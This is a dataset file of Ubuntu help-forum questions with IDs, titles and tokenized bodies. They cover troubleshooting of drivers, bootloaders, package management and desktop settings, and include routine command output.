33126	getting a canon lide 200 to work	i have this canon lide 200 but simple scan can not use it properly . with the new sane-backend from rober-ancell 's ppa the scanner head at least moves a little , but simple-scan simply fails telling me that the scanning fails in a red banner below the menu bar . is there some way to get it to work ?
33128	how can i install adobe flash player ?	i 'm trying to install flash player on my new install of ubuntu 10.10 . i 've tried several ways , from the flash player website , another question on here , and i asked a friend of mine for help , but none of them seem to be working . i 'm pretty illiterate with ubuntu ( this is my 1st time using it ) , therefore i would politely ask for a explanation with all steps required . thank you in advance for your help .
33129	why can i not synchronize anything except files ?	i installed ubuntu one both on my desktop ( 64bit ) and my laptop ( 32bit ) . on the laptop , when i go to the `` services '' tab i can not select anything except files . is there anyway to solve it ? or there is any way to manually synchronize bookmarks ? thanks in advance for your help .
33131	what can be done when the repositories listed in sources.list go down	for many days i was trying to do apt-get update and i used to get a error : could not connect to server . i had thought it must be a issue related to my machine . later , accidentally , when i copied and pasted a link from the sources file onto browser address bar i found that it was because the resolving of domain names of the repositories for my country was failing . i , painfully , edited the sources.list files on all my 3 machines from in.archive to us.archive . and it worked fine . so , my question is is n't it possible to specify multiple repositories existing is different locations ?
33138	non correct app name in docky	i have a problem with docky . when i open some folder ( for example home directory ) docky always show name `` диск c '' . this is wine directory , in english it 's `` drive c '' . see : how can i do , that in docky shows name of opened folder ?
33139	my touchpad is recognised as a mouse . how can i fix it ?	my touchpad is recognised as a mouse , and for this reason i can not disable it while i 'm typing nor can i take advantage of scrolling and multi-touch features that my touchpad should support . my machine is a netbook hp mini 210 1000sa and i 'm currently using natty 32bit , but i have experienced this same issue before with lucid and maverick . i 've searched the entire web looking after a solution for this , but i have n't found anything but lots of people experiencing the same problem , including users of different machines . i really hope that there is a solution for this issue or at least that it will be fixed in natty , as it is really annoying . is anyone able to provide us ( me and the hundreds of poor souls with the same problem ) a relief ? thank you very much indeed ! p.s . : information that might help : angelo @ xxx : ~ $ cat /proc/bus/input/devices i : bus=0019 vendor=0000 product=0001 version=0000 n : name= '' power button '' p : phys=pnp0c0c/button/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0 u : uniq= h : handlers=kbd event0 b : prop=0 b : ev=3 b : key=100000 0 0 0 i : bus=0019 vendor=0000 product=0005 version=0000 n : name= '' lid switch '' p : phys=pnp0c0d/button/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0c0d:00/input/input1 u : uniq= h : handlers=event1 b : prop=0 b : ev=21 b : sw=1 i : bus=0019 vendor=0000 product=0001 version=0000 n : name= '' power button '' p : phys=lnxpwrbn/button/input0 s : sysfs=/devices/lnxsystm:00/lnxpwrbn:00/input/input2 u : uniq= h : handlers=kbd event2 b : prop=0 b : ev=3 b : key=100000 0 0 0 i : bus=0011 vendor=0001 product=0001 version=ab41 n : name= '' at translated set 2 keyboard '' p : phys=isa0060/serio0/input0 s : sysfs=/devices/platform/i8042/serio0/input/input3 u : uniq= h : handlers=sysrq kbd event3 b : prop=0 b : ev=120013 b : key=20000 0 20 0 0 0 0 500f 2100002 3803078 f900d401 feffffdf ffefffff ffffffff fffffffe b : msc=10 b : led=7 i : bus=0019 vendor=0000 product=0000 version=0000 n : name= '' hp wmi hotkeys '' p : phys=wmi/input0 s : sysfs=/devices/virtual/input/input4 u : uniq= h : handlers=kbd event4 b : prop=0 b : ev=23 b : key=40 0 0 0 7 0 0 2100400 0 0 0 0 b : sw=22 i : bus=0003 vendor=064e product=f100 version=0332 n : name= '' hp webcam-50 '' p : phys=usb-0000:00:1d.7-4/button s : sysfs=/devices/pci0000:00/0000:00:1d.7/usb1/1-4/1-4:1.0/input/input5 u : uniq= h : handlers=kbd event5 b : prop=0 b : ev=3 b : key=100000 0 0 0 0 0 0 i : bus=0019 vendor=0000 product=0006 version=0000 n : name= '' video bus '' p : phys=lnxvideo/video/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input6 u : uniq= h : handlers=kbd event6 b : prop=0 b : ev=3 b : key=3e000b 0 0 0 0 0 0 0 i : bus=0011 vendor=0002 product=0001 version=0000 n : name= '' ps/2 synaptics touchpad '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input7 u : uniq= h : handlers=mouse0 event7 b : prop=0 b : ev=7 b : key=70000 0 0 0 0 0 0 0 0 b : rel=3 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hda intel mic at ext front jack '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:1b.0/sound/card0/input8 u : uniq= h : handlers=event8 b : prop=0 b : ev=21 b : sw=10 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hda intel hp out at ext front jack '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:1b.0/sound/card0/input9 u : uniq= h : handlers=event9 b : prop=0 b : ev=21 b : sw=4 angelo @ xxx : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ hp webcam-50 id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=12 [ slave keyboard ( 3 ) ] angelo @ xxx : ~ $ cat /var/log/xorg.0.log | grep -i synaptics [ 21.058 ] ( ii ) config/udev : adding input device ps/2 synaptics touchpad ( /dev/input/event7 ) [ 21.058 ] ( ** ) ps/2 synaptics touchpad : applying inputclass `` evdev pointer catchall '' [ 21.058 ] ( ** ) ps/2 synaptics touchpad : always reports core events [ 21.058 ] ( ** ) ps/2 synaptics touchpad : device : `` /dev/input/event7 '' [ 21.068 ] ( -- ) ps/2 synaptics touchpad : found 3 mouse buttons [ 21.068 ] ( -- ) ps/2 synaptics touchpad : found relative axes [ 21.068 ] ( -- ) ps/2 synaptics touchpad : found x and y relative axes [ 21.068 ] ( ii ) ps/2 synaptics touchpad : configuring as mouse [ 21.068 ] ( ** ) ps/2 synaptics touchpad : yaxismapping : buttons 4 and 5 [ 21.068 ] ( ** ) ps/2 synaptics touchpad : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 21.068 ] ( ii ) xinput : adding extended input device `` ps/2 synaptics touchpad '' ( type : mouse ) [ 21.069 ] ( ii ) ps/2 synaptics touchpad : initialized for relative axes . [ 21.069 ] ( ** ) ps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 21.069 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration profile 0 [ 21.069 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 21.069 ] ( ** ) ps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 21.070 ] ( ii ) config/udev : adding input device ps/2 synaptics touchpad ( /dev/input/mouse0 ) angelo @ xxx : ~ $ xinput -- list-props 11 device 'ps/2 synaptics touchpad ' : device enabled ( 135 ) : 1 coordinate transformation matrix ( 137 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 255 ) : 0 device accel constant deceleration ( 256 ) : 1.000000 device accel adaptive deceleration ( 257 ) : 1.000000 device accel velocity scaling ( 258 ) : 10.000000 evdev axis inversion ( 259 ) : 0 , 0 evdev axes swap ( 261 ) : 0 axis labels ( 262 ) : `` rel x '' ( 145 ) , `` rel y '' ( 146 ) button labels ( 263 ) : `` button left '' ( 138 ) , `` button middle '' ( 139 ) , `` button right '' ( 140 ) , `` button wheel up '' ( 141 ) , `` button wheel down '' ( 142 ) evdev middle button emulation ( 264 ) : 0 evdev middle button timeout ( 265 ) : 50 evdev wheel emulation ( 266 ) : 0 evdev wheel emulation axes ( 267 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 268 ) : 10 evdev wheel emulation timeout ( 269 ) : 200 evdev wheel emulation button ( 270 ) : 4 evdev drag lock buttons ( 271 ) : 0 angelo @ xxx : ~ $
33140	notify-osd and dual monitors	i use ubuntu 10.10 on a laptop , with an external monitor , which is used as the primary . notify-osd alerts show on the connected monitor , as i want . however , some days ago i removed both gnome panels and installed awn . all was good , but notify-osd alerts now appears on the laptop . i need , that notify-osd appears on the connected monitor . how can i move notify-osd alerts on the connected monitor without gnome panels ?
33142	will you merge update-manager into software center ?	this could be good to see in oneiric
33143	how do i install a new docky theme ?	how do i install themes for docky ?
33145	how do i disable comment fetching in liferea ?	while reading lifehacker , liferea freezes on every single post loading the comments . frankly , i do not really care for these , so how can i disable the loading all together ?
33147	will totem be substituted by banshee ?	since banshee now can play videos with subtitles , probably in few months it will gain full dvd menu support , and is in strong development , will it be the time to remove totem form the default application list ? i guess so . thanks .
33149	is `` ubuntu tweak '' considered to be a `` safe '' program ?	is `` ubuntu tweak '' considered to be a safe program for us on my 10.10 os . also i was concerned whether or not it was safe to delete all the programs that show up in the `` package cleanup '' option ?
33156	`` switch to specific workspace '' shortcuts do n't work after a reboot	i 've defined some shortcuts to access each of my workspaces : < super > +1 for the first < super > +2 for the second etc ... when i assign these shortcuts , they function properly until i reboot . i have no idea why it 's happening . for some reason , on the desktop i have at work ( same distrib , 10.10 ) , it works fine . to make them function again , i need to un-asign all of them , and then reasigning them again . i have a script which automate these operations : gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_1 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_2 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_3 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_4 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_5 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_6 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_7 gconftool-2 -- unset /apps/metacity/global_keybindings/switch_to_workspace_8 gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_1 `` < mod4 > ampersand '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_2 `` < mod4 > eacute '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_3 `` < mod4 > quotedbl '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_4 `` < mod4 > apostrophe '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_5 `` < mod4 > parenleft '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_6 `` < mod4 > minus '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_7 `` < mod4 > egrave '' gconftool-2 -t str -- set /apps/metacity/global_keybindings/switch_to_workspace_8 `` < mod4 > undersocre '' but when i configure this script to be run at startup , strangely it does n't work . anyone have clues about how to solve this ?
33158	how to download songs from amazon 's cloud player ?	using the latest banshee ( 1.9.6 ) and the amazon mp3 extension , i just bought an album , and it was copied to my amazon cloud drive/player . how do i download this to my computer ? banshee 's amazon mp3 does not seem to open the amazon cloud player pages , and the amazon cloud player website keeps asking me to use their downloader program ( which did n't work , perhaps too old ) . on a side note , i can download the files individually from the amazon cloud drive website , but that is not an ideal solution . i want to click a few buttons , download the whole album at once , and import it into banshee ( like it used to , before the cloud drive stuff ) .
33163	how can i upload package for several ubuntu versions to launchpad automatically ?	see the title . i using dput and in my /etc/dput.cf : [ ppa ] fqdn = ppa.launchpad.net method = ftp incoming = ~onto/onto/ubuntu/ login = anonymous allow_unsigned_uploads = 0 but it build only for version in debian/changes , but i want build for another versions too . how to do it ?
33166	ppa for recent versions of mercurial	im trying to access mercurial repositories that were created on windows with mercurial version 1.8.2 . as the version in the repositories is a few numbers behind , its not playing ball . does anyone know if there is a repository with up to date versions of mercurial or am i best just to build it from source ?
33170	installing ubuntu on a usb stick from live cd session	i 'm going by the instructions here : how do i install ubuntu to a usb key ? everything is ok except i keep getting the error : open /dev/kvm : no such file or directory could not initialize kvm , will disable kvm support failed to find rom file etc . etc . then the kvm window opens but it is black and says remove disks or other media and press any key to restart . i am booted up in a live cd session and trying to install on a usb stick .
33171	no photo album sharing like dropbox in ubuntu one	i would really like to be able to settle on ubuntu one , but i ca n't find a way to share pictures/photos like i can with dropbox . dropbox has a `` photos '' folder where i can put up pictures and a link to share those pictures as a shared gallery can be created from right clicking on the folder in nautilus . is there a way to share pictures , or are they simply treated like any other files in ubuntu one . if the latter is the case consider this a feature request .
33178	wine takes ages to start	applications running under wine literally takes several minutes ( 10+ mins ) to start . if i check with the system monitor , that application will just keep on sitting with the status pipe_wait under waiting channel . and this is not with just one application , its with everything running under wine . how do i go about troubleshooting this ?
33180	stuck in grub rescue after windows install	i used to have a dual boot between ubuntu ( lucid ) and windows 7 , but wanted to upgrade my windows to 64 bit , so i installed the new windows , which naturally wrote over the mbr , and so i attempted to repair it using the following guide : https : //help.ubuntu.com/community/grub2 # reinstalling % 20grub % 202 . i had a lot of trouble following it , but managed to get the system to boot to some grub command line , instead of windows , which i thought was useful . then i did something screwy and now when i boot i get a grub rescue command line . so i follow the instructions on that same page related to rescue mode , but am a bit confused . if i do ls , i get : ( hd0 ) ( hd0 , msdos1 ) ( hd1 ) ( hd1 , msdos5 ) ( hd1 , msdos1 ) if i attempt to list the contents of these partitions , the only one that works is ( hd1 , msdos1 ) , all of the others say `` unknown filesystem . '' examining the contents of this partition , it appears to contain my ubuntu home directory . in any case , i found some combination of commands that do something : set prefix= ( hd1 , msdos1 ) /boot/grub set root= ( hd1 , msdos1 ) insmod /boot/grub/linux.mod linux /vmlinuz root=/dev/sdb1 ro initrd /initrd.img boot it then looks like it 's going to work , but i find myself in some kind of prompt which calls itself busybox initramfs . i try various things , but ca n't figure out how to run the command update-grub as recommended .
33182	how do i set which postgresql version is to be used by default ?	i have 2 different versions of postgresql installed on my system ( ubuntu lucid ) : /var/lib/postgresql/8.4 /var/lib/postgresql/9.0 by default , when i run a postgresql command such as createdb or psql , the 9.0 version is used . how do i configure my system to use the 8.4 version by default instead ?
33185	how to setup a ubuntu home network based on a powerful server and many outdated laptops as terminals ?	i am wondering if it is easy to do this . i know that using x to serve the other computers ai n't that difficult . i just have no idea how would i have to configure the laptops in order for them to work as terminals .
33187	boot straight to grub without holding 'option ' on macbook ?	i am dual-booting lucid and snow leopard on a macbook pro 5,3 . i have uninstalled refit , and i am wondering if there is a way ( without reinstalling refit ) to boot automatically to the grub menu without requiring me to hold option and select the `` windows '' partition at each boot . since there is actually no windows installation on my computer , i ca n't access the boot camp assistant to tell os x to boot to the windows partition by default .
33190	no sound on a realtek ac97	i just installed ubuntu 10.10 and i 've no sound . i tried few method suggested in ubuntu forums like reinstall alsa but nothing works ? my pc is old and my audio card is realtek 's ac'97 . any suggestions how can i resolve this problem ? update actually my audio card died after installing ubuntu , so when i 'm backed to win it still not worked .
33193	will there be a place for example a website or a ppa that holds all the lenses for unity ?	with the new feature lenses in the natty unity launcher will there be a website , ppa or something be created to easily get hold of them so users can browse and install the ones there want ? at the moment there is the default applications , files and folders lenses , but optionally there is two others at this point , the askubuntu and gwibber lenses each with a separate ppa . it would be easier if they where all in one place .
33194	thunderbird : `` could not initialize the application 's security component ''	in thunderbird , on startup , i get the error message : `` could not initialize the application 's security component '' the message continues to check permissions of the profile , and free disk space . df -h shows , that i have 19g free disk space . find . -not -perm -644 -not -perm -600 -ls shows : no file without rw-permissions for me . before the error occured , thunderbird worked well . but i changed my main mail-account . i had two , let 's call them a and b , and used mainly a , but now i wanted to deaktivate it , and receive and send automatically via the second . i had problems moving the filters from inbox a to inbox b ( missing copy-functionality ) . in the web , i found ( mollazine ) hints , to move key3.db , cert8.db and secmode.db out of the way , but it did n't work for me . another hint was to uninstall quickcam ( ? . sic ! ) , but i do n't have quickcam . a third to recreate the profile , but i have subdirectories , filters , addressbook , groups - mails back to the year 2003 . i do n't want to risk the loss of data . the whole errormessage is : could not initialize the application 's security component . the most likely cause is problems with files in your application 's profile directory . please check that this directory has no read/write restrictions and your hard disk is not full or close to full . it is recommended that you exit the application and fix the problem . if you continue to use this session , you might see incorrect application behaviour when accessing security features . when i open the error-console , it is empty .
33196	how to convert latex equations to svg ?	at the moment , i 'm using mimetex to automatically convert a bunch of equations into gif-images . the program is fast , but the images look pretty bad : how can i ( quickly ) convert a latex equation into an svg image on the command line ?
33199	installing matlab and its launcher icon	hello , i am trying to install matlab . i got it installed , but i am having a hard time getting the launcher icon to work using the instructions from here . i get a icon in my applications > programming taskbar but when i click the matlab launcher icon , it gives me an error saying : could not launch 'matlab r2010a' failed to execute child process '' matlab '' ( no such file or directory ) how can i fix this ? as an alternative route , is there another way to launch matlab without the matlab launcher icon ? thanks ! : )
33200	how do i create a compiz launcher on the desktop ?	i 'm running ubuntu 11.04 beta 1 , and i 've noticed compiz likes to crash , every now and then . i 'd like to create a compiz on my desktop , so if it does , i can run that to bring it back up . thanks in advance !
33202	do comboboxes support keyboard input in gtk+ 3 ?	several of the comboboxes that i use regularly ( the box to select syntax highlighting in the gedit statusbar , boxes for choosing smart playlist criteria in banshee , etc ) require me to click on them with the mouse , scroll down for awhile , then click on the item that i want . being able to type into these boxes and have the list jump to the first matching entry would be a nice time saver . so i 'm wondering , has this been implemented in gtk+ 3 ? if not , is there a bug report somewhere that i could subscribe to ? and is there a technical reason that this has n't been implemented , or is it a design decision . since this behavior is common in all major web browsers , i 'm sure i 'm not the first person to think of this , but a few minutes of googling did n't lead me to anything relevant .
33203	why am i unable to `` test drive '' applications in the software center ?	i 'm running ubuntu 11.04 beta . one of the new features that i 've seen being advertised is the ability to `` test drive '' an application . i wanted to try this out so i installed qtnx like so : sudo apt-get install qtnx . however once i went back into the software center it did not give me the option to test drive an app . the only buttons that showed up were more info and install . clicking more info just display a longer description and another install button . how can i enable the `` test drive '' feature ?
33204	why am i unable to install the nvidia 96 driver ?	i have a old nvidia card that needs the nvidia 96 driver to enable all the fancy compiz effects ( the noveau free driver does n't work ) . i tried installing it with ubuntu software center but it said that it had dependency problems .
33211	are there any free/open source alternatives to adobe after effects ?	i 've been a illustrator and graphic designer for a number of years and now i 'm looking to go more into motion graphics and visual effects . is there anything that is open source/free ( not a demo , education version or trial ) that is as complex and feature-rich as adobe after effects but for linux ? i 've tried cinlerra , kdenlive , openshot and blender and whilst they are good at video editing ( and 3d modelling in blender 's case ) they fall short in effects and compositing features . i 've also tried ramen , but the project recently closed and the last update was quite buggy . also , cinefx/jahshaka does n't work and has n't been updated in many many years , so do n't mention it ; - )
33212	is there an alternative to adobe fireworks ?	i often have to make designs for internet-use . i have had fireworks for years and it suits my purpose . these are the details i like in it : good tools for moderate image manipulation ( cutting , cropping , color changes , overlaying one image with another , blurring , etc . ) possibilities to draw other objects easily ( squares , lines , circles , shapes ) easy options to apply textures , shadows , gradients , and other effects . preview of jpg / gif / png export , easy quality settings - > useful when exporting for the web . ease of dragging , resizing , and moving objects ( images , shapes , text ) around on a canvas ease of working with vectors and bitmaps at the same time so i guess those are the main qualities i like a lot in fireworks . now that i use ubuntu i 've tried gimp and inkscape , and some others , but i can not find all of the aforementioned qualities . maybe it 's me , but fireworks still rules when it comes to these things , imho . so i run it under wine . but that 's really a pain ... it 's slow and behaves erratically . is there anybody who has found a good replacement for fireworks ? or knows a program that might fit my needs ? thanks !
33213	does ubuntu need to be defragmented ?	does the filesystem in ubuntu need to be defragment like the windows ? ?
33218	how do i theme the maximized window buttons with unity ?	i use a custom gtk theme along with the default ambiance window controls . using my theme , the unity panel shows its very ugly default buttons when my window is maximized . since i have the same window theme , i am assuming this comes from the gtk theme . i tried copying and pasting a few things from ambiance 's gtkrc , but nothing has stuck so far . what must a theme author do to gain pretty looking window buttons in unity 's panel ?
33219	how can i disable my touchpad ?	i would like to find a way to turn my laptop touchpad on and off . ( i generally use a mouse instead . ) i use an hp laptop . thanks .
33221	need for speed shift 1-2	is there any way to install either shift 1 or shift 2 on ubuntu ? thanks in advance
33227	does ubuntu really need an anti-virus ?	do i need install it anti-virus on ubuntu ? or unnecessary ? i just want to know this . please thanks . please professional honest an opinions , thanks .
33228	possible to add all subdirectories when adding a directory to $ path	when adding some directory to $ path by path=~/my_program/bin : ” $ { path } ” is it true that only executables directly under the directory will be found via $ path , but other executables under its subdirectores will not ? is it possible to make all its subdirectories added ? sometimes specify all the subdirectories explicitly can be a lot of work when there are many . thanks and regards !
33230	is there a way to set a password to access the computer ?	not the login keyring thing that pops up , but some people are being nosy and using my computer and i 'd like to set a password before ubuntu desktop even loads so people ca n't access my computer . is this possible ?
33235	how can i show the unity launcher with the mouse ?	i love that unity launch panel hides itself when a window is over it , but when i move the mouse over to the left edge of the screen , the panel wo n't show itself so that i can launch other programs that are placed in it similar to the way docky does .
33238	failure to install a package from the command line ?	here 's an example : hp-g62-notebook-pc : ~ $ ccsm the program 'ccsm ' is currently not installed . you can install it by typing : sudo apt-get install compizconfig-settings-manager reborn @ reborn-hp-g62-notebook-pc : ~ $ sudo apt-get install compizconfig-setting-manger [ sudo ] password for reborn : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package compizconfig-setting-manger hp-g62-notebook-pc : ~ $
33239	livecd no unity in virtualbox	i have started the natty beta 1 iso as a `` try ubuntu '' in a virtualbox vm . when it starts up there appears to be only the desktop and an `` examples '' folder available - no unity or anything . is this supposed to happen ? or is this a bug to report ? i wanted to have a look at natty as-is , while my `` stable '' linux is using maverick .
33246	how do i change the mouse acceleration curve ?	how do i tweak the precise mathematical curve used for the mouse acceleration in ubuntu ?
33252	how to make my own command with parameters	i am tired of javac filename.java and then java filename is n't there a way to make my own command ? mycommand filename.java and the filename.java is both compiled and run ? ?
33254	hp pavilion dv2000 web camera driver	i got this information using lsusb : bus 001 device 002 : id 0c45:62c0 microdia sonix usb 2.0 camera i have problem with my camera . when i use web camera in supported application , like bandoo chat application at facebook , or any web page with camera support . i have installed cheese or luvcview . both are working on my laptop but when i use web based application with camera support , then application fails to detect my camera . is there any problem with my camera driver ? i have not installed specific driver .
33260	difference between vim-gtk and vim-gnome	how are the packages vim-gtk and vim-gnome different from each other ? i 've tried both and the resulting gvim feels the same ( to me ) . if there is no difference , why are both packages maintained ?
33261	how do i handle updates having installed digikam using ppas ?	in ubuntu 10.10 i installed digikam : sudo apt-add-repository ppa : philip5/extra sudo apt-add-repository ppa : philip5/kubuntu-backports sudo apt-add-repository ppa : kubuntu-ppa/backports sudo apt-get update sudo apt-get install digikam2 kipi-plugins2 when running the update manager , i am informed : not all updates can be installed run a partial upgrade , to install as many updates as possible this can be caused by : * a previous upgrade which did n't complete * problems with some of the installed software * unofficial software packages no provided by ubuntu * normal changes of a pre-release version of ubuntu i click 'close ' rather than 'partial upgrade ' , and i can then select which of the updates to install . however , some are greyed out , including some `` important security updates '' : complete generic linux kernel , generic linux kernel headers and generic linux kernel image . also , tortoisehg ppa updates from another ppa are greyed out . how should i go about making sure the core ubuntu system and my other packages installed via ppa are updated whilst still having digikam installed ( and preferably updated via ppa , too ) ? i 've been using ubuntu for a while , but am not familiar with all the ins and outs of package management . if i should include output from apt-get , please let me know . thanks . edit : updating with terminal output : sudo apt-get -v upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : kdebase-runtime ( 4.5.1-0ubuntu3.1 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) ksysguard ( 4.5.1-0ubuntu8 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) ksysguardd ( 4.5.1-0ubuntu8 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) libksgrd4 ( 4.5.1-0ubuntu8 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) libksignalplotter4 ( 4.5.1-0ubuntu8 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) libprocessui4a ( 4.5.1-0ubuntu8 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) linux-generic ( 2.6.35.27.35 = > 2.6.35.28.36 ) linux-headers-generic ( 2.6.35.27.35 = > 2.6.35.28.36 ) linux-image-generic ( 2.6.35.27.35 = > 2.6.35.28.36 ) plasma-scriptengine-javascript ( 4.5.1-0ubuntu3.1 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) tortoisehg ( 1.1.1-1 = > 2.0+repack-0ppa1~maverick1 ) tortoisehg-nautilus ( 1.1.1-1 = > 2.0+repack-0ppa1~maverick1 ) vlc ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) vlc-nox ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) vlc-plugin-notify ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) vlc-plugin-pulse ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) the following packages will be upgraded : akonadi-server ( 1.5.0-0ubuntu1~maverick1~ppa1 = > 1.5.1-0ubuntu1~maverick1~ppa1 ) gtk2-engines-equinox ( 1.30-ubuntu3 = > 1.40 ) kompare ( 4.5.1-0ubuntu3 = > 4.6.1-0ubuntu1~maverick1~ppa1 ) libakonadiprotocolinternals1 ( 1.5.0-0ubuntu1~maverick1~ppa1 = > 1.5.1-0ubuntu1~maverick1~ppa1 ) libgpg-error0 ( 1.6-1ubuntu2 = > 1.10-0ubuntu2~maverick1~ppa1 ) liborc-0.4-0 ( 0.4.11-1~maverick1 = > 0.4.11-maverick~ppa1 ) libschroedinger-1.0-0 ( 1.0.10-1~maverick1 = > 1.0.10-maverick~ppa1 ) libvlc5 ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) libvlccore4 ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) nvidia-current ( 260.19.06-0ubuntu1 = > 260.19.36-maverick~ppa1 ) nvidia-current-modaliases ( 260.19.06-0ubuntu1 = > 260.19.36-maverick~ppa1 ) nvidia-settings ( 260.19.06-0ubuntu1 = > 260.19.29-maverick~ppa1 ) policykit-1-gnome ( 0.96-2ubuntu4 = > 0.99-1ubuntu1~maverick1~ppa1 ) qapt-batch ( 1.0.3-0ubuntu2 = > 1.1.1-0ubuntu1~maverick2 ) transmission-common ( 2.04-0ubuntu2 = > 2.22-maverick~ppa1 ) vlc-data ( 1.1.4-1ubuntu1.4 = > 1.1.8-maverick~ppa1 ) 16 upgraded , 0 newly installed , 0 to remove and 16 not upgraded . need to get 57.9mb of archives . after this operation , 5,988kb disk space will be freed . do you want to continue [ y/n ] ? the top five packages in the screenshot are greyed out . it seems like packages from the digikam ppas i 've added are blocking ( ? ) packages that would otherwise be updated . ideally , i would like to use the ppas concerning digikam only for digikam itself ( and its actual dependencies ) but not other packages such as the nvidia driver and transmission and whatnot , and allow other standard packages from ubuntu 10.10 to be used as normal .
33263	is it possible to type a thin and hair space without entering the unicode ?	is it possible to type a hair space ( u200a ) and a thin space ( u2009 ) in ubuntu without entering the unicode code ? something with the compose key ?
33273	is it normal for nm-applet to use 1,5gig of ram ?	nm-applet suspiciously uses about 1 gig of ram on ubuntu 10.10 . is this normal behavior ?
33274	how come sudo give root privileges for a user not in /etc/sudoers ?	i just wonder how sudo privileges are found with ubuntu , from a technical point of view . users with sudo privileges are not present in /etc/sudoers , so this looks a little bit exotic . was the source code of 'sudo ' modified to look to other configuration files ? thanks
33276	how do i fix my package state after the installation process ( dpkg ) was interrupted ?	i got the following message when i tried to open update . e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . e : _cache- > open ( ) failed , please report . please help me to solve it .
33280	use `` locate '' under some specific directory ?	i was wondering how to restrict the search range of `` locate '' to some directory ? for example , how to find files/directories with string `` math '' in their names under some directory `` /home/tim/science/ '' ? thanks and regards !
33284	sharing zimbra local folders between ubuntu and windows	i am dual booting windows 7 and ubuntu . i am looking for a way to share zimbra local folders between windows and ubuntu . is this possible ? this is to enable access to emails downloaded to local folder while logged into windows or ubuntu .
33288	is there a way to share resources of a machine by running a program on one machine , but display it on another ?	is there a way to sort of `` share '' processing power between two machines ? i already use x2x and ssh to communicate between the two , but the two but that works with two moniters aswell . is there a way i could have them both connected , but if i click an app on one machine ( lets say cpu1 ) it would open on the machine with the most available ram , and if it opens on cpu2 the window itself would still be on cpu1 ? big ask , i know . if i have n't been clear enough then just ask . more importantly , will anyone help me code this ?
33296	ubuntu available for smart phones ?	recently , we have heard a lot about different powerful tablets and smartphones with operating systems such as android or ios . now fortunately we see ubuntu 11.04 will be available for tablets too . my question is that whether this version of ubuntu will be available for smart phones with phoning features too ? i mean can we have it on smart phones such as samsung galaxy tab1 ? thanks in advance . . .
33299	moving from ubuntu to windows 7 , need hard to be ntfs format	ok so i want to change operating systems , i got a new pc recently that had no operating system so i installed ubuntu on it . i now want to install windows 7 but when i put in the install disk it says it needs my hard drive to be in the ntfs format . how can i change my hard rive to this format in ubuntu ?
33301	tool for creating pie charts	i need a tool for creating high quality customizable pie charts , then export them to some graphic format ( e.g . png ) . i need something which allows me to put in some data and which is more customizable than openoffice.org .
33305	ca n't install apt-file and ubuntu tweak in terminal	i tried to install the packages 'apt-file ' 'ubuntu tweak ' and 'checkinstall ' using the sudo apt-get install command in 10.10 , but terminal reported 'package not found ' even after sudo apt-get update . what am i doing wrong ? i really those packages as i 'm yet to compile a single source . please help a newbie ubuntu rocks !
33308	upgrade crash samba4 error	upgrade to natty failed to finish , with an error related to samba4 , failed to load modules from /usr/lib/samba/ldb . now i am unable to update or run synaptic . how can i fix this ?
